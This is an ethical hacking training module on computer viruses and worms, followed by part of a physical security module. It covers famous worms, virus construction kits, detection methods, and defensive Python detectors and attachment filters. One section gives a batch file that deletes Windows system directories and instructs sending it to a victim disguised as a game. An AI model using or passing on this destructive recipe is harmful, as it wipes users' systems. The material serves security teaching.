Module Objectives 



© Virus - characteristics, history and some terminologies

© Difference between a virus and a worm

© Virus history

© Life cycle of a virus

© Types of virus and reasons why they are considered harmful

© Famous viruses/worms

© Writing a simple program which can disrupt a system

© Effect of virus on business

© Virus hoaxes

© How a virus spreads and infects the system

© Indications of a virus attack

© Virus construction kits

© Virus detection methods

© Antivirus tools

© Antivirus software

© Dealing with virus infections

© Sheep dip

© Few computer viruses to be checked for
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Module Flow

[Flow diagram; nodes: Characteristics, Virus Hoax, Virus and Worm, Indications of virus attack, Virus construction kit, Virus in the wild, Virus life cycle, Virus classification, Virus detection, ...]
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[... Response, Countermeasures, Virus in 2004]
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© Computer viruses are perceived as a threat to both business and personnel.

© This module looks into the details of computer viruses: their functions, classifications, and the manner in which they affect systems.

© The module also highlights the various countermeasures that one can take against virus attacks.
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Virus Characteristics

© A virus is a program that reproduces its own code by attaching itself to other executable files such that the virus code is run when the infected executable file is executed.

© Viruses and malicious code exploit the vulnerability in a program.

Operates without the knowledge or desire of the computer user
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Symptoms of Virus-Like Attack

© If the system acts in an unprecedented manner, a virus attack can be suspected. Example: Processes take more resources and are time consuming.

© However, not all glitches can be attributed to virus attacks.

• Examples include:

• Certain hardware problems.

• If the computer beeps with no display

• If one out of two anti-virus programs reports a virus on the system.

• If the label of the hard drive has changed, etc.
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What is a Virus Hoax?

A virus hoax is a bluff in the name of a virus

© For example, following the outbreak of the W32.bugbear@mm worm, there was a hoax warning users to delete the jdbgmgr.exe file that has a bear icon.

© Being largely misunderstood, viruses easily generate myths. Most hoaxes, while deliberately posted, die a quick death because of their outrageous content.
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Terminologies

© Worms

• A worm does not require a host to replicate.

• Worms are a subset of virus programs.

© Logic Bomb

• A code surreptitiously inserted into an application or operating system that causes it to perform some destructive or security-compromising activity whenever specified conditions are met is known as a logic bomb.

© Time Bomb

• A time bomb is considered to be a sub form of logic bomb that is triggered by reaching some preset time, either once or periodically.

© Trojan

• A Trojan is a small program that runs hidden on an infected computer.
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How is a Worm Different from a Virus?

© There is a difference between general viruses and worms.

© A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs.

© A worm spreads through the infected network automatically but a virus doesn't.



[Screenshot: CNN.com article "Computer worm grounds flights, blocks ATMs", Jan. 26, 2003]

Computer worm grounds flights, blocks ATMs

Experts: Little damage in worst Internet attack in 18 months

WASHINGTON (CNN) — A fast-moving computer worm snarled business and government computers Saturday, slowing some corporate systems to the point of inaccessibility. Internet security experts said the worm does not appear to have done any serious damage.

The worm, dubbed "SQL Slammer," attacked via a vulnerability discovered six months ago in SQL Server 2000 software from Microsoft Corp., according to Oliver Friedrichs, a senior manager with Internet security firm Symantec Corp. Microsoft has offered a free patch to fix the trouble spot, but not all users of the server software installed the patch.

Experts called it the most damaging attack on the Internet in 18 months as networks across Asia, Europe and the Americas were effectively shut down, Reuters reported.

Bank of America Corp., one of the nation's largest banks, said many customers could not withdraw money from its 13,000 ATMs because of technical problems caused by the attack, according to The Associated Press. A spokeswoman, Lisa Gagnon, told the AP that the bank restored service to nearly all ATMs by late Saturday afternoon and that customers' money and personal information had not been at risk.

Friedrichs said the SQL worm "breaks into the server and tries to spread."

"It really generates a lot of network traffic," Friedrichs said. "It's really just going to slow down Internet performance."

The White House was notified about the attack after it was discovered early Saturday, said Tiffany Olson, a spokeswoman for the President's Critical Infrastructure Protection Board.
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Indications of a Virus Attack

The following are some indications of a virus attack:

- Programs take longer to load than normal.

- Computer's hard drive constantly runs out of free space.

- Files have strange names which are not recognizable.

- Programs act erratically.

- Resources are used up easily.
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Virus History
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Year of discovery    Virus Name

1981    Apple II Virus - First Virus in the wild
1983    First Documented Virus
1986    Brain, PC-Write Trojan, & Virdem
1989    AIDS Trojan
1995    Concept
1998    Strange Brew & Back Orifice
1999    Melissa, Corner, Tristate, & Bubbleboy
2003    Slammer, Sobig, Lovgate, Fizzer, Blaster/Welchia/Mimail
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Virus Damage

© Virus damage can be grouped broadly under:

• Technical Attributes: The technicalities involved in the modeling and use of virus causes damage due to:

1. Lack of control
2. Difficulty in distinguishing the nature of attack.
3. Draining of resources.
4. Presence of bugs.
5. Compatibility problems.
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Virus Damage

© Virus damage can be further attributed as:

• Ethical and Legal Reasons: There are legalities and ethics involved ruling why virus and worms are damaging.

• Psychological Reasons such as:

- Trust Problems

- Negative influence

1. Unauthorized Data Modification
2. Copyright problems
3. Misuse of the virus
4. Misguidance by virus writers
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Effect of Virus on Business

© According to a study by Computer Economics, a US research institute, computer viruses cost companies worldwide US$7.6 billion in 1999.

© In January 2003, the SQL Slammer worm led to technical problems that temporarily kept Bank of America's customers from their cash, but did not directly cause the ATM outage.

© As most of the business around the world relies on the internet for most of its transactions, it is quite natural that once a system within a business network is affected by a virus there is a high risk of financial loss to the business.
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Access Methods of a Virus

© The following are ways to get infected by a computer virus:

Floppy Disks
Internet
Email
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Mode of Virus Infection

© Viruses infect the system in the following ways:

• Loads itself into memory and checks for executables on the disk.

• Appends the malicious code to the unsuspecting program.

• Launches the real infected program, as the user is unaware of the replacement.

• If the user executes the infected program, other programs get infected as well.

• The above cycle continues until the user realizes the anomaly within the system.
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Life Cycle of Virus

© Like its biological counterpart, the computer virus also has a life cycle right from its birth (creation) to death (eradication) of the virus.

Design
Reproduction
Launch
Detection
Incorporation
Elimination
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Virus Classification

Viruses are classified based on the following lines:
1. What they infect.
2. How they infect.
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What does a Virus Infect?

1. System Sectors
2. Files
3. Macros
4. Companion Files
5. Disk Clusters
6. Batch Files
7. Source Code
8. Worms using Visual Basic
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How does a Virus Infect

1. Polymorphic Virus
2. Stealth Virus
3. Fast and Slow Infectors
4. Sparse Infectors
5. Armored Virus
6. Multipartite Virus
7. Cavity (Space filler) Virus
8. Tunneling Virus
9. Camouflage Virus
10. NTFS ADS Virus
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Famous Virus / Worms
W32.CIH.Spacefiller (a.k.a Chernobyl)

© Chernobyl is a deadly virus. Unlike the other viruses that have surfaced recently, this one is much more than a nuisance.

© If infected, Chernobyl will erase data on the hard drive, and may even keep the machine from booting up at all.

© There are several variants in the wild; each variant activates on a different date. Version 1.2 on April 26th, 1.3 on June 26th, and 1.4 on the 26th of every month.

Classic tool presented here for proof of concept
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Famous Viruses / Worms
Win32/ExploreZip Virus

© ExploreZip is a Win32-based email worm. It searches for Microsoft Office documents on the hard drive and network drives.

© When it finds any Word, Excel, or PowerPoint documents using the following extensions: .doc, .xls, and .ppt, it erases the contents of those files. It also emails itself to anyone who sends the victim an email.

© ExploreZip arrives as an email attachment. The message will most likely come from someone known, and the body of the message will read:

"I received your email and I shall send you a reply ASAP. Till then, take a look at the attached Zipped docs." The attachment will be named "Zipped_files.exe" and have a WinZip icon. Double clicking the program infects your computer.

Classic tool presented here for proof of concept
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Famous Viruses / Worms
I Love You Virus



E ILOVEYOU Message (Plain Text) 



File Edit View Insert Format Tools Actions Help 



Reply I Reply to All | Forward | # 1% § | r | X 



' A ® 



You replied on Thursday, May 04, ZOOO 9:13 AM. 



From; [ (name removed to protect sender ] 

To; [Victim] 

Cc; 

Subiect; ILOVEYOU 



Sent; Thu 5/4/00 8;39 AM 



kindly check the attached LOVELETTEH coming from me. 



LOVE-LET.. 
(10KB) 



The virus discussed herearemore 
of a proof of concept, as they have 
been instrumental in the evolution 
of both virus and anti-virus 
programs 
Classic tool presented here for proof of concept

© Love Letter is a Win32-based email worm written in VBScript. It overwrites certain files on the hard drives and sends itself out to everyone in the Microsoft Outlook address book.

© Love Letter arrives as an email attachment named LOVE-LETTER-FOR-YOU.TXT.vbs, though new variants have different names including VeryFunny.vbs, virus_warning.jpg.vbs, and protect.vbs. The double extension works because Windows hides the final ".vbs" by default, so the file appears to be a harmless .TXT or .jpg.
Melissa

© Melissa is a Microsoft Word macro virus. Through macros, the virus alters the Microsoft Outlook email program so that the virus gets sent to the first 50 people in the address book.

© It does not corrupt any data on the hard drive or crash the computer. However, it alters MS Word settings (it turns off Word's macro virus protection so later infected documents open without warning).

Melissa arrives as an email attachment. The subject of the message containing the virus reads "Important message from" followed by the name of the person whose email account it was sent from.

The body of the message reads: "Here's the document you asked for... don't show anyone else ;-)"

Double-clicking the attached Word document (typically named LIST.DOC) will infect the machine.

Classic tool presented here for proof of concept

EC-Council
Copyright © by EC-Council
All Rights reserved. Reproduction is strictly prohibited
Melissa Virus - Case

[Screenshot of a news article, "Melissa's long gone, but lessons remain": the virus started spreading on March 26, 1999 and traveled quickly; hundreds of thousands of PCs were infected. It was not the first e-mail worm, but it was the one that caught attention, because it showed how quickly e-mail could be used to spread malicious code.]
Pretty Park

© Pretty Park is a privacy-invading worm. Every 30 seconds, it tries to email itself to the email addresses in the Microsoft Outlook address book.

© It has also been reported to connect the victim machine to a custom IRC channel for the purpose of retrieving passwords from the system.

© Pretty Park arrives as an email attachment. Double-clicking the PrettyPark.exe or Files32.exe program infects the computer.

© Sometimes the 3D Pipes screen saver is seen after running the executable.
Code Red

© Following the landing of the U.S. "spy plane" on Chinese soil, loosely grouped hackers from China started attacks directed against the White House. Code Red is assumed to be a part of this.

© The "Code Red" worm attempts to connect to TCP port 80 on a randomly chosen host, assuming that a web server will be found.

© Upon a successful connection to port 80, the attacking host sends a crafted HTTP GET request to the victim, attempting to exploit a buffer overflow in the Indexing Service ISAPI extension (idq.dll) of IIS on Windows 2000.

© If the exploit is successful, the worm takes part in a distributed denial of service whereby the slave machines attack the White House web site.

© The assumption of Chinese origin arises from the last line found in the disassembled code, which reads:

HELLO! welcome to http://www.worm.com! Hacked By Chinese!

Classic tool presented here for proof of concept
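The request Code Red sent is easy to recognise in web server logs: the worm asked for /default.ida with a long run of N characters (Code Red I) or X characters (Code Red II) followed by %u-encoded shellcode, as documented in CERT advisories CA-2001-19 and CA-2001-23. The detector below is an added example, not part of the original courseware; it runs over constructed access-log lines in the common log format (the IP addresses and timestamps are made up) and reports the source and variant of every hit.

```python
import re

# Constructed access-log lines in common log format; the IPs and timestamps are
# made up. Code Red I padded the query with 'N', Code Red II with 'X'; both were
# followed by %u-encoded shellcode (the %u9090%u6858%ucbd3 prefix is the one
# quoted in the CERT advisories).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [19/Jul/2001:10:12:03 -0400] "GET /index.html HTTP/1.0" 200 1543',
    '10.0.0.9 - - [19/Jul/2001:10:12:07 -0400] "GET /default.ida?'
    + 'N' * 224 + '%u9090%u6858%ucbd3%u7801 HTTP/1.0" 200 0',
    '10.0.0.12 - - [04/Aug/2001:02:44:51 -0400] "GET /default.ida?'
    + 'X' * 224 + '%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 0',
    '10.0.0.3 - - [19/Jul/2001:10:13:00 -0400] "GET /default.htm HTTP/1.0" 200 812',
]

# A request to default.ida with at least 100 padding characters followed by
# %u-encoded words is the worm; a legitimate Indexing Service query looks nothing like this.
CODE_RED_RE = re.compile(
    r'"GET /default\.ida\?(?P<pad>[NX]{100,})(?P<shell>(?:%u[0-9a-fA-F]{4})+)'
)


def classify_request(line):
    """Return 'code-red-1', 'code-red-2' or None for a single access-log line."""
    m = CODE_RED_RE.search(line)
    if not m:
        return None
    # The padding character distinguishes the original worm from the 'II' variant.
    return 'code-red-1' if m.group('pad')[0] == 'N' else 'code-red-2'


def scan_log(lines):
    """Return (source_ip, variant) for every line that carries the worm's request."""
    hits = []
    for line in lines:
        variant = classify_request(line)
        if variant is not None:
            hits.append((line.split(' ', 1)[0], variant))
    return hits


if __name__ == '__main__':
    for src, variant in scan_log(SAMPLE_LOG_LINES):
        print(f'{src}: {variant}')
```

The HTTP status in the log does not matter: a patched server answers 404 and is not infected, but the line still identifies an infected host at the source address that should be reported to its owner.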
W32/Klez

Aliases: ElKern, KLAZ, Kletz, I-Worm.Klez, W95/Klez@mm

© W32.Klez variants are mass-mailing worms that search the Windows address book for email addresses and send messages to all the recipients they find. The worm uses its own SMTP engine to send the messages, so it does not depend on the victim's mail client.

© The subject and attachment name of the incoming emails are randomly chosen. The attachment will have one of the extensions .bat, .exe, .pif or .scr.
[Screenshot: a Klez message as received in Microsoft Outlook]

From: Doe, John [jdoe@your_address.com]
To: 'virus@commandcom.com'
Subject: A very new game
Sent: Wed 4/17/02 9:17 AM

Hello. This is a very new game
This game is my first work.
You're the first player.
I wish you would like it.

Attachments: prcacu.exe, preview1_13[1].jpg

The worm exploits a vulnerability in Microsoft Outlook and Outlook Express (the incorrect MIME header handling fixed by MS01-020) to try to execute itself when the victim opens or merely previews the message.
Bug Bear

© The virus is being showcased here as a proof of concept.

© The worm propagates via shared network folders and via email. It also terminates antivirus programs, acts as a backdoor server application, and sends out system passwords (it includes a keystroke logger), all of which compromise security on infected machines.

This worm fakes the FROM field and obtains the recipients for its email from email messages, address books, and mailboxes on the infected system. It generates the filename for the attached copy of itself from the following:

A combination of text strings (setup, card, docs, news, image, images, pics, resume, photo, video, music, song, data) with any of the extensions .SCR, .PIF or .EXE; or the name of an existing system file appended with any of the extensions .SCR, .PIF or .EXE.

Classic tool presented here for proof of concept
SirCam Worm

© SirCam is a mass-mailing email worm with the ability to spread through Windows network shares.

© SirCam sends emails with variable user names and subject fields, and attaches user documents with double extensions (such as .doc.pif or .xls.lnk) to them.

[Screenshot: a SirCam message as received in a German-language Outlook; field labels translated]

From: FIV d.o.o. [fiv@zg.hinet.hr]
To: airlines2000@gmx.at
Subject: PONUDA GPZ
Sent: Wed 05.09.01 09:49

Hi! How are you?
I send you this file in order to have your advice
See you later. Thanks

Attachments: PONUDA GPZ.xls.pi..., ATT00005.txt

The worm collects a list of files with certain extensions (.DOC, .XLS, and .ZIP) into fake DLL files named "sc*.dll" and sends itself out with one of the document files it finds in the user's My Documents folder.
Nimda

© Nimda is a complex virus with a mass-mailing worm component which spreads itself in attachments named README.EXE. It affects Windows 95, 98, ME, NT4, and Windows 2000 users.

[Figure: Nimda traffic recorded by LaBrea and web servers; log-scale hit counts over time, LaBrea hits plotted against web server hits. Source: http://www.fwsystems.com/nimda/nimda.gif]

Classic tool presented here for proof of concept

Nimda is showcased here as it is the first worm to modify existing websites to start offering infected files for download. It is also the first worm to use normal end-user machines to scan for vulnerable websites. Nimda uses the Unicode (directory traversal) exploit to infect IIS web servers.
SQL Slammer

© On January 25, 2003 the SQL Slammer worm was released by an unknown source.

© The worm significantly disrupted many Internet services for several hours. It also adversely affected the bulk electric system controls of two entities for several hours.

© Slammer was a single 376-byte UDP datagram sent to port 1434, the SQL Server 2000 Resolution Service (the overflow fixed by MS02-039). A host was infected and scanning as soon as it received one packet, which is why the spread was so fast, and blocking UDP/1434 at the perimeter was enough to stop it.

[Figure: "Sapphire/SQL worm seen from TRIUMF", 24 to 25 January 2003 (PST); packets, sources, destinations and outgoing traffic per interval on a y-axis up to 120,000, with the traffic saturating network equipment. Source: http://andrew.triumf.ca/slammer.html]

The worm carried no destructive payload, and the very speed of the worm hampered its spread, as the noticeable slowdown in Internet traffic also slowed Slammer's spread.

Classic tool presented here for proof of concept
Doomjuice

© It uses the computers infected by Mydoom.a and Mydoom.b to spread.

© It is approximately 34 KB in size.

© It tries to establish connections to ports 3127 to 3198, the backdoor ports opened by Mydoom.

© Compressed using UPX.

© It also launches a DoS attack on the Microsoft site.

© The presence of the intrenat.exe file is an indication of a likely infection.

Classic tool presented here for proof of concept
Writing a Simple Virus Program

© Step 1: Create a batch file Game.bat with the following text:

 • @echo off
 • del c:\winnt\system32\*.*
 • del c:\winnt\*.*

© Step 2: Convert the Game.bat batch file to Game.com using the bat2com utility.

© Step 3: Send the Game.com file as an email attachment to a victim.

© Step 4: When the victim runs this program, it deletes core files in the WINNT directory, making Windows unusable.
Virus Construction Kits

© Virus creation programs and construction kits can automatically generate viruses.

© There are a number of virus construction kits available in the wild.

© Some virus construction kits are:

Kefi's HTML Virus Construction Kit
Virus Creation Laboratory v1.0
The Smeg Virus Construction Kit
Rajaat's Tiny Flexible Mutator v1.1
Windows Virus Creation Kit v1.00
Examples of Virus Construction Kits

Batch Virus Generator v1.1c: This program makes batch viruses. Requires MS-DOS to function.

Virus Creation Laboratory v1.0: Belongs to those very popular virus creation programs. Nowhere Man's V.C.L. is a potentially dangerous program, and great care should be used when experimenting with *any* virii, trojans, or logic bombs produced by it.

Nuke GenVirus: Needs MS-DOS to work.

Instant Virus Production Kit v1.7: Requires MS-DOS v6.0 or higher.

Macro Virus Development Kit v1.0b: A tool which generates macro viruses for Microsoft WinWord, according to user specifications.

Nuke Randomic Life Generator v0.66b: Generates resident viruses.

Rajaat's Tiny Flexible Mutator v1.1: RTFM is an object module that can be linked to your virus to make it impossible for a scanner to use a simple string. It will encrypt your virus and generate a random decryptor using random registers and random instructions. Therefore, an algorithmic approach will be needed to detect viruses using this object module.

G2 Phalcon/Skism's: Requires MS-DOS v6.0 or higher.

The Super Appending Batch VCK v1.1k: This program generates replicating appending batch virus programs from user-specified parameters. Needs MS-DOS v6.0 or higher.

SkamWerks Labs: This program generates macro viruses for MS Word v6.0.

Trojan Horse Construction Kit v1.0: Simple trojan horse toolkit. Requires MS-DOS v6.0 or higher.

The Simple WinScript Virus Kit v1.1k: VBS WinScript virus construction toolkit.

VBS Worm Generator v2.0 BETA: Powerful VB Script worm generator.

Virus Factory: Virus construction kit. Requires MS-DOS v6.0 or higher.

Senna Spy Worm Generator 2000: VB Script worm generator.
Virus Detection Methods

© The following techniques are used to detect viruses:

 • Scanning (matching files against a database of known byte signatures)
 • Integrity Checking (comparing file checksums against a trusted baseline taken while the system was clean)
 • Interception (monitoring for virus-like behaviour, such as writes to executables or to the boot sector, while programs run)
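To show what scanning means in practice, and why a mutator such as RTFM (listed in the construction kit table above) defeats a scanner that relies on a simple string, here is an added Python example that is not part of the original courseware. It runs a plain string scanner over a clean sample, over a sample with a signature appended in the clear, and over a copy whose appended body has been XOR-encoded with a per-copy key, then shows the "algorithmic" approach of trying every single-byte key before matching. The signature strings and sample file contents are constructed for the example (the first signature reuses the text Code Red left in its code, quoted earlier on this page), and single-byte XOR stands in for a real polymorphic decryptor.

```python
# Constructed signature strings for the example (the first is the text Code Red
# left in its code, quoted earlier on this page; the second is made up).
SIGNATURES = {
    "Sample.CodeRed": b"HELLO! welcome to http://www.worm.com! Hacked By Chinese!",
    "Sample.B": b"\xde\xad\xbe\xef\x13\x37",
}


def scan_bytes(data, signatures=SIGNATURES):
    """Plain string scanning: names of every signature that appears verbatim in data."""
    return sorted(name for name, sig in signatures.items() if sig in data)


def xor_encode(data, key):
    """Single-byte XOR of the body; stands in for the decryptor a mutator prepends."""
    return bytes(b ^ key for b in data)


def scan_with_xor_decoding(data, signatures=SIGNATURES):
    """Algorithmic scanning: try every single-byte XOR key, then string-match.

    Returns {signature_name: key}; key 0 means the signature was found in the clear.
    A real engine would emulate the decryptor stub instead of brute-forcing keys.
    """
    found = {}
    for key in range(256):
        for name in scan_bytes(xor_encode(data, key), signatures):
            found.setdefault(name, key)
    return found


# Constructed sample files: a clean host program, the same program with the
# signature appended in the clear, and a copy whose appended body was XOR-encoded
# with a per-copy key (0x5A) so that no fixed byte string survives.
CLEAN = b"MZ\x90\x00" + b"ordinary program text " * 4
INFECTED = CLEAN + SIGNATURES["Sample.CodeRed"] + b"\x00padding"
MUTATED = CLEAN + xor_encode(SIGNATURES["Sample.CodeRed"], 0x5A) + b"\x00padding"

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN), ("infected", INFECTED), ("mutated", MUTATED)):
        print(label, "string scan:", scan_bytes(sample),
              "xor-aware scan:", scan_with_xor_decoding(sample))
```

The string scanner finds the clear copy and misses the encoded one; the key-trying scanner finds both and reports the key it needed. Trying 256 keys is cheap here but does not scale to the random multi-instruction decryptors a real mutator emits, which is why production engines emulate the decryptor or match on the decryptor's structure rather than on the encrypted body.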
Virus Incident Response

1. Detect the attack: not all anomalous behaviour can be attributed to viruses.

2. Trace processes using utilities such as handle.exe, listdlls.exe, fport.exe, netstat.exe and pslist.exe, and map commonalities between affected systems.

3. Detect the virus payload by looking for altered, replaced or deleted files. New files, changed file attributes and shared library files should be checked.

4. Acquire the infection vector and isolate it. Update anti-virus signatures and rescan all systems.
What is Sheep Dip?

© Slang term for a computer which connects to a network only under strictly controlled conditions and is used for the purpose of running anti-virus checks on suspect files, incoming messages, etc.

© It may be inconvenient and time-consuming for an organization to give all incoming email attachments a 'health check', but the rapid spread of macro viruses associated with word processor and spreadsheet documents, such as the 'Resume' virus circulating in May 2000, makes this approach worthwhile.
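A sheep-dip station needs a first triage rule before any attachment reaches a user. The Python example below is added here and is not part of the original courseware; it applies the lesson of the worms in this module: block anything whose real extension is executable and call out the double-extension trick (LOVE-LETTER-FOR-YOU.TXT.vbs, PONUDA GPZ.xls.pif), quarantine unknown types, and let documents through only after an anti-virus scan, since a .DOC can still carry a macro virus like Melissa. The extension sets are assumptions drawn from the attachment names on this page, not a complete list.

```python
# Extensions Windows executes on double-click. Drawn from the worms in this
# module (.exe, .com, .vbs, .bat, .pif, .scr, .lnk) plus a few common ones;
# an assumption for the example, not an exhaustive list.
EXECUTABLE_EXTENSIONS = {"exe", "com", "vbs", "vbe", "js", "bat", "cmd", "pif", "scr", "lnk"}

# Extensions the worms above used as the decoy half of a double extension.
DOCUMENT_EXTENSIONS = {"doc", "xls", "ppt", "txt", "jpg", "gif", "zip", "pdf"}


def triage_attachment(filename):
    """Return (verdict, reason) where verdict is 'block', 'quarantine' or 'allow'."""
    parts = filename.strip().lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return ("quarantine", "no usable extension")
    ext, hidden = parts[-1], parts[1:-1]
    if ext in EXECUTABLE_EXTENSIONS:
        # Windows hides the final extension by default, so 'x.TXT.vbs' shows as 'x.TXT'.
        if any(p in DOCUMENT_EXTENSIONS for p in hidden):
            return ("block", f"document extension hidden before executable .{ext}")
        return ("block", f"executable attachment .{ext}")
    if ext in DOCUMENT_EXTENSIONS:
        return ("allow", f"document .{ext} (scan with current anti-virus; macros possible)")
    return ("quarantine", f"unknown extension .{ext}")


def triage_message(attachment_names):
    """Worst verdict across all attachments of one message, with the per-file reasons."""
    order = {"allow": 0, "quarantine": 1, "block": 2}
    verdicts = [triage_attachment(n) for n in attachment_names]
    worst = max(verdicts, key=lambda v: order[v[0]], default=("allow", "no attachments"))
    return worst[0], verdicts


# Attachment names taken from the worms described in this module, plus two
# harmless constructed names.
SAMPLE_ATTACHMENTS = [
    "LOVE-LETTER-FOR-YOU.TXT.vbs", "Zipped_files.exe", "PONUDA GPZ.xls.pif",
    "README.EXE", "LIST.DOC", "quarterly.pdf", "notes",
]

if __name__ == "__main__":
    for name in SAMPLE_ATTACHMENTS:
        print(f"{name!r}: {triage_attachment(name)}")
```

Name-based triage is only the first gate: a renamed executable or a macro document passes it, so the "allow" verdict still means "scan on the isolated machine before release", which is the whole point of the sheep dip.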
Virus Analysis - IDA Pro Tool

© It is a disassembler and debugger that supports both Windows and Linux platforms.

© It is an interactive, programmable, extendible, multi-processor disassembler.

© Used in the analysis of hostile code, vulnerability research and software reverse engineering.

© Allows automated unpacking/decrypting of protected binaries through its scripting language and plug-ins.

Classic tool presented here for proof of concept
Prevention is Better than Cure

© Do not accept disks or programs without checking them first using a current version of an anti-viral program.

© Do not leave a floppy disk in the disk drive longer than necessary.

© Do not boot the machine with a disk in the disk drive, unless it is a known "clean" bootable system disk.

© Keep the anti-virus software up to date - upgrade on a regular basis.
© One of the preventions against viruses is to install anti-virus software and keep the updates current.

© There are many anti-virus software vendors. Here is a list of some freely available anti-virus software for personal use:

AVG Free Edition
VCatch Basic
AntiVir Personal Edition
Bootminder
Panda ActiveScan
Popular Anti-Virus Packages

© Aladdin Knowledge Systems
http://www.esafe.com/

© Central Command, Inc.
http://www.centralcommand.com/

© Command Software Systems, Inc.
http://www.commandcom.com

© Computer Associates International, Inc.
http://www.cai.com

© Frisk Software International
http://www.f-prot.com/

© F-Secure Corporation
http://www.f-secure.com

© Trend Micro, Inc.
http://www.trendmicro.com

© McAfee (a Network Associates company)
http://www.mcafee.com

© Network Associates, Inc.
http://www.nai.com

© Norman Data Defense Systems
http://www.norman.com

© Panda Software
http://www.pandasoftware.com/

© Proland Software
http://www.pspl.com

© Sophos
http://www.sophos.com

© Symantec Corporation
http://www.symantec.com
New Viruses in 2005

© Worm.Win32.Bizex
© I-Worm.Moodown.b
© I-Worm.Bagle.b
© I-Worm.Bagle.a
© I-Worm.Klez
© Worm.Win32.Welchia.a
© Worm.Win32.Welchia.b
© Worm.Win32.Doomjuice.a
© Worm.Win32.Doomjuice.b
Summary

© Viruses come in different forms.

© Some are mere nuisances; some come with devastating consequences.

© Email worms are self-replicating and clog the networks with unwanted traffic.

© Virus code is not necessarily complex.

© It is necessary to scan the systems/networks for infections on a periodic basis for protection against viruses.

© Antidotes to new virus releases are promptly made available by security companies, and this forms the major countermeasure.
Ethical Hacking

Module XVII
Physical Security

Real World Scenario

Michael, a practicing computer security consultant, was asked to do a physical security test by the chief of a very well known database firm. Their database was considered a major competitive edge. They believed their systems were secure, but wanted to be sure of it.

Michael went to the firm on the pretext of meeting the chief of the firm. Before entering the lobby, Michael had driven around the building and checked for loopholes in physical security where he could slip easily into the building.
Real World Scenario (contd.)

He walked to the loading bays, walked up the stairs, and proceeded through the warehouse to what was an obvious entrance into the office building. Michael knew the location of the computer room. He took the elevator down and entered the room, which was secured with cipher locks and access cards guarding its every entrance. He went straight to the tape racks. There, he studied the racks, as if looking for specific information. He grabbed a tape with an identifier that looked something like ACCT95QTR1.

The entire escapade lasted no more than 15 minutes. During that time, Michael breached their physical security by entering the building and taking a tape.
Module Objective

© Security statistics
© Physical security breach incidents
© Understanding physical security
© What is the need for physical security?
© Who is accountable for physical security?
© Factors affecting physical security
© Major components needed to implement a good physical security program
© Physical security checklist
© Locks
© Summary
Module Flow

[Flow diagram connecting the module topics:]
Physical security breach incidents
Understanding physical security
What is the need for physical security?
Who is accountable for physical security?
Physical security checklist
Locks
Security Statistics

© According to a 2002 report, 53% more notebooks were stolen in the US in 2001 than in 2000.
Source: Safeware Insurance Group

© The average financial loss resulting from a laptop theft grew by 44% from 2000 to 2001 ($62,000 to $89,000).
Source: 2001 and 2002 Computer Security Institute/FBI Computer Crime & Security Survey

© Although the laptop's claim to fame is its mobility, according to a survey in Support Republic, respondents indicated that laptops were most often lost or stolen on corporate property, not while traveling.
Source: TechRepublic, June 4, 2001

© "Across campus, laptop theft is a rising problem, up 37 percent in 2003 from the previous year. For police, the thefts are frustrating because they are difficult to solve and easy to stop." - Yale Daily News, February 12, 2004
Physical Security Breach Incidents

© In 2001 Yasuo Takei, the chairman of Japan's biggest consumer lender Takefuji, was arrested on charges of wiretapping a journalist and others.

© In September 2001 a terrorist outfit created havoc in the US and offices of major firms were physically damaged.

© In December 2003 Jesus C. Diaz, who once worked as an AS/400 programmer for Hellmann Worldwide Logistics, was sentenced to one year of imprisonment for accessing the company's computer system remotely and deleting critical OS/400 applications.

© In the year 2003, a laptop containing the names, addresses and Social Security numbers of about 43,000 customers was stolen from Bank Rhode Island's principal data-processing provider.
Understanding Physical Security

© Since man has had something important to protect, he has found various methods of protecting it.

© The Egyptians were the first to develop a working lock.

© Physical security describes measures that prevent or deter attackers from accessing a facility, resource, or information stored on physical media.

© Physical security is an important component of computer security.

© Physical security measures protect the computer both from environmental conditions (climate, fire, water) and from intruders who use or attempt to use physical access to the computer to break into it; most of the measures are aimed at the intruders.

What Is the Need for Physical Security?

© To prevent any unauthorized access to computer systems

© To prevent tampering with or stealing of data from computer systems

© To protect the integrity of the data stored in the computer

© To prevent loss of data or damage to systems from natural calamities
Who Is Accountable for Physical Security?

© In most organizations there is not a single person who is accountable for physical security.

© The following set of people should be made accountable for the security of a firm, which includes both physical and information security:

 • The plant's security officer
 • Safety officer
 • Information systems analyst
 • Chief information officer



© Foil owing are the factors which affect the physi cal 
securityof a particular firm: 

• Vandalism 

• Theft 

• Natural cal anni ties: 

- Earthquake 

- Fire 

- Flood 

- Lightning and thunder 

• Dust 

• Water 

• Explosion 

• Terrorist attacks 
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Physical Security Checklist 



© Company surroundings 
© Premises 
© Reception 
© Server 

© Worl<station area 
© Wireless access points 

© Other equipment, such as fax, removable media, etc 
© Access control 

© Computer equipment maintenance 
© Wiretapping 
© Remote access 
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Physical Security Checklist 



© Company surroundings 

• The entrance to the company 
premises should be restricted to 
only authorized access. 

• The foil owing is the checklist for 
securi ng the company 
surroundings: 

- Fences 

- Gates 

- Walls 

- Guards 

- Alarms 





BC-Councll 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Physical Security Checklist

© Premises

 • Premises can be protected by the following:
  - Checking for roof/ceiling access through AC ducts.
  - Use of CCTV cameras with monitored screens and video recorders.
  - Installing intruder detection systems.
  - Installing panic buttons.
  - Installing burglar alarms.
  - Window and door bars.
  - Deadlocks.
Physical Security Checklist

© Reception

 • The reception area is usually busier than other areas of the firm, with many people coming and going.
 • The reception area can be protected by the following:
  - Files and documents, removable media, etc. should not be kept on the reception desk.
  - Reception desks should be designed to discourage inappropriate access to the administrative area by non-staff members.
  - Computer screens should be positioned in such a way that people near the reception desk cannot observe the screen.
  - Computer monitors, keyboards, and other equipment at the reception desk should be locked whenever the receptionist is away from the desk, and they should be logged off after office hours.
Physical Security Checklist

© Server

 • The server, which is the most important component of any network, should be given a higher level of security.
 • The server room should be well lit.
 • The server can be secured by the following means:
  - The server should not be used to perform day-to-day activities.
  - It should be enclosed and locked to prevent any physical movement.
  - Remove any DOS partition and bootable DOS media from Windows servers: an intruder who can boot the machine into DOS bypasses the operating system's file permissions.
  - Disable booting from floppy disk and CD-ROM drives on the server or, if possible, avoid having these drives on the server.
Physical Security Checklist

© Workstation Area

 • This is the area where the majority of employees work.
 • Employees should be educated about physical security.
 • The workstation area can be physically secured by taking the following steps:
  - Use CCTV
